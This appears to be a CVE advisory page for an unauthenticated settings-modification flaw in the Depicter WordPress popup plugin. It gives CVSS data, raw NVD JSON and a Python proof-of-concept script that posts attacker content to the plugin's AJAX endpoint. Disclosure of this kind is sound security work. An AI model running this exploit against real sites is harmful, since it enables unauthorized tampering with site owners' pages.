Security Vulnerability Report
CVE-2025-11370 CVSS 5.3 MEDIUM

CVE-2025-11370

Published: 2026-01-06 04:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Popup and Slider Builder by Depicter – Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'store' function of the RulesAjaxController class in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to update pop-up display settings.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Depicter plugin <= 4.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11370 PoC - Unauthenticated Data Modification
# Target: WordPress site with Depicter plugin <= 4.0.7
import requests
import json

target_url = "http://target-wordpress-site.com"

# Step 1: Identify the vulnerable endpoint
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Step 2: Construct malicious request to modify popup settings
# The 'store' function in RulesAjaxController lacks capability check
payload = {
    "action": "depicter_store_rules",
    "rules": json.dumps({
        "popup_id": 1,
        "settings": {
            "enabled": True,
            "trigger_type": "immediate",
            "content": "Malicious content injected by attacker",
            "display_frequency": "always"
        }
    })
}

# Step 3: Send unauthenticated request
response = requests.post(ajax_endpoint, data=payload)

# Step 4: Check if modification was successful
if response.status_code == 200:
    result = response.json()
    if result.get("success"):
        print("[+] Popup settings modified successfully!")
        print(f"[+] Response: {result}")
    else:
        print("[-] Request failed")
else:
    print(f"[-] HTTP Error: {response.status_code}")

print("\nNote: This PoC demonstrates the vulnerability exists.")
print("The attacker can modify popup display settings without authentication.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11370", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:51.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Popup and Slider Builder by Depicter – Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'store' function of the RulesAjaxController class in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to update pop-up display settings."}, {"lang": "es", "value": "El plugin Popup and Slider Builder by Depicter – Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función 'store' de la clase RulesAjaxController en todas las versiones hasta la 4.0.7, inclusive. Esto hace posible que atacantes no autenticados actualicen la configuración de visualización de los pop-ups."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/RulesAjaxController.php", "source": "[email protected]"}, {"url": "https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/ajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3428118/depicter/trunk/app/routes/ajax.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d35faf39-4882-4393-9b77-57dc45ac9d04?source=cve", "source": "[email protected]"}]}}